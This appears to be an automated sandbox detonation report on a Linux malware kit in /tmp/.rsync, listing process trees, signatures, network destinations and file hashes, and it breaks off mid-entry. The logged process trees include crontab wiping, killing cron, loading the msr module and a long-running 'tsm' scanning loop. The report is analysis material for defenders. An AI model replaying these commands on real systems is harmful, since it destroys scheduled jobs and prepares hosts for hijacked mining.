[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

Network

N/A

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

0s

Max time network

132s

Command Line

[/tmp/.rsync/c/lib/64/libc.so.6]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/64/libc.so.6

[/tmp/.rsync/c/lib/64/libc.so.6]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsel-20240611-en

Max time kernel

11s

Command Line

[/tmp/.rsync/a/run]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/bash.pid /tmp/.rsync/a/run N/A

Processes

/tmp/.rsync/a/run

[/tmp/.rsync/a/run]

/tmp/.rsync/a/stop

[./stop]

/bin/sleep

[sleep 10]

/bin/cat

[cat dir.dir]

/bin/uname

[uname -m]

Network

N/A

Files

/tmp/.rsync/a/dir.dir

MD5 b3d878adcf4672bbd1f31cffac10c769
SHA1 ce5798837933ece35a7e26a0a3dc06cab19c6275
SHA256 ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7
SHA512 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c

/tmp/.rsync/a/bash.pid

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-armhf-20240418-en

Max time kernel

0s

Command Line

[/tmp/.rsync/c/golan]

Signatures

N/A

Processes

/tmp/.rsync/c/golan

[/tmp/.rsync/c/golan]

Network

N/A

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.rsync/c/lib/32/libdl.so.2]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/32/libdl.so.2

[/tmp/.rsync/c/lib/32/libdl.so.2]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

10s

Max time network

129s

Command Line

[/tmp/.rsync/a/a]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/.rsync/a/upd /tmp/.rsync/a/upd N/A

Loads a kernel module

rootkit
Description Indicator Process Target
N/A /lib/modules/4.15.0-213-generic/kernel/arch/x86/kernel/msr.ko /sbin/modprobe N/A

Enumerates running processes

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/devices/system/node /tmp/.rsync/a/a N/A
File opened for reading /sys/module/msr/initstate /sbin/modprobe N/A

Reads runtime system information

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/upd /tmp/.rsync/a/a N/A
File opened for modification /tmp/.rsync/a/.proc /tmp/.rsync/a/stop N/A
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/bash.pid /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/a N/A

Processes

/tmp/.rsync/a/a

[/tmp/.rsync/a/a]

/usr/bin/crontab

[crontab -r]

/bin/cat

[cat dir.dir]

/usr/bin/nproc

[nproc]

/sbin/sysctl

[sysctl -w vm.nr_hugepages=1]

/usr/bin/find

[find /sys/devices/system/node/node0 -maxdepth 0 -type d]

/sbin/modprobe

[modprobe msr]

/bin/grep

[grep AMD Ryzen]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep Intel]

/bin/cat

[cat /proc/cpuinfo]

/bin/chmod

[chmod u+x upd]

/bin/chmod

[chmod 777 a anacron cron dir.dir run stop upd]

/tmp/.rsync/a/upd

[./upd]

/tmp/.rsync/a/run

[./run]

/tmp/.rsync/a/stop

[./stop]

/usr/bin/pkill

[pkill -9 cron]

/usr/bin/killall

[killall -9 cron]

/usr/bin/awk

[awk {print $1}]

/bin/grep

[grep -v grep]

/bin/grep

[grep cron]

/bin/ps

[ps x]

/bin/rm

[rm -rf .proc]

/bin/sleep

[sleep 10]

/bin/cat

[cat dir.dir]

/bin/uname

[uname -m]

/tmp/.rsync/a/cron

[./cron]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 89.187.167.5:443 tcp

Files

/tmp/.rsync/a/dir.dir

MD5 b3d878adcf4672bbd1f31cffac10c769
SHA1 ce5798837933ece35a7e26a0a3dc06cab19c6275
SHA256 ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7
SHA512 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c

/tmp/.rsync/a/upd

MD5 a136fbe534c2487d3c89bd6a26847bd0
SHA1 11b9362ba79b67dd5d5baf7cf11e0003f049d6e0
SHA256 419a443ff93475ef3abb6e71e5a94e56aea8b7c1f1c4402b3662425815432d46
SHA512 85047cf9d22037d2581ae41275107b243c0bb3259b57fe46bd3fd04a1abe75a7fdeace8a9eae1fae31349a00183206b40259ab3957db8f4f16a79e67133485e9

/tmp/.rsync/a/bash.pid

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

0s

Max time network

132s

Command Line

[/tmp/.rsync/a/cron]

Signatures

N/A

Processes

/tmp/.rsync/a/cron

[/tmp/.rsync/a/cron]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsbe-20240418-en

Max time kernel

11s

Command Line

[/tmp/.rsync/a/run]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/bash.pid /tmp/.rsync/a/run N/A

Processes

/tmp/.rsync/a/run

[/tmp/.rsync/a/run]

/tmp/.rsync/a/stop

[./stop]

/bin/sleep

[sleep 10]

/bin/cat

[cat dir.dir]

/bin/uname

[uname -m]

Network

N/A

Files

/tmp/.rsync/a/dir.dir

MD5 b3d878adcf4672bbd1f31cffac10c769
SHA1 ce5798837933ece35a7e26a0a3dc06cab19c6275
SHA256 ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7
SHA512 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c

/tmp/.rsync/a/bash.pid

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-armhf-20240611-en

Max time kernel

1s

Command Line

[/tmp/.rsync/a/stop]

Signatures

Enumerates running processes

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/.proc /tmp/.rsync/a/stop N/A

Processes

/tmp/.rsync/a/stop

[/tmp/.rsync/a/stop]

/usr/bin/pkill

[pkill -9 cron]

/usr/bin/killall

[killall -9 cron]

/bin/ps

[ps x]

/bin/grep

[grep cron]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/rm

[rm -rf .proc]

Network

N/A

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsel-20240418-en

Max time kernel

0s

Command Line

[/tmp/.rsync/c/golan]

Signatures

N/A

Processes

/tmp/.rsync/c/golan

[/tmp/.rsync/c/golan]

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

132s

Command Line

[/tmp/.rsync/c/lib/32/libnss_files.so.2]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/32/libnss_files.so.2

[/tmp/.rsync/c/lib/32/libnss_files.so.2]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

129s

Command Line

